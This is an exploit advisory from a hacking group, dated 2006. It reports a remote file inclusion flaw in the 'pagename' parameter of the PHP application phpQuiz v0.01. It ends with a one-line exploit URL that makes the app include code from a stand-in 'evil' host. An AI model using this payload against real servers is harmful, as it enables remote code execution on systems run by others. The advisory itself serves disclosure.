#############################SolpotCrew Community################################=0D
#=0D
#  phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion =0D
#=0D
# Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip=0D 
#=0D
#################################################################################=0D
#=0D
#=0D
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (14-09-2006)=0D
#=0D
# contact: chris_hasibuan@yahoo.com =0D 
# =0D
# Website : http://www.nyubicrew.org/adv/solpot-adv-07.txt=0D 
#=0D
################################################################################=0D
#=0D
#=0D
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid=0D
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa=0D
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo=0D
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX=0D
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ ,#nyubi , #hitamputih @dalnet=0D
# and all member solpotcrew community @ http://www.nyubicrew.org/forum/=0D 
#              especially thx to str0ke @ milw0rm.com=0D
#=0D
###############################################################################=0D
Input passed to the "pagename" is not properly verified  =0D
before being used to include files. This can be exploited to execute  =0D
arbitrary PHP code by including files from local or external resources.  =0D
=0D
code from index.php=0D
=0D
=0D
=0D
exploit : http://somehost/path_to_phpQuiz/index.php?pagename=http://evil=0D 
=0D
##############################MY LOVE JUST FOR U RIE#########################  =0D
######################################E.O.F################################## =0D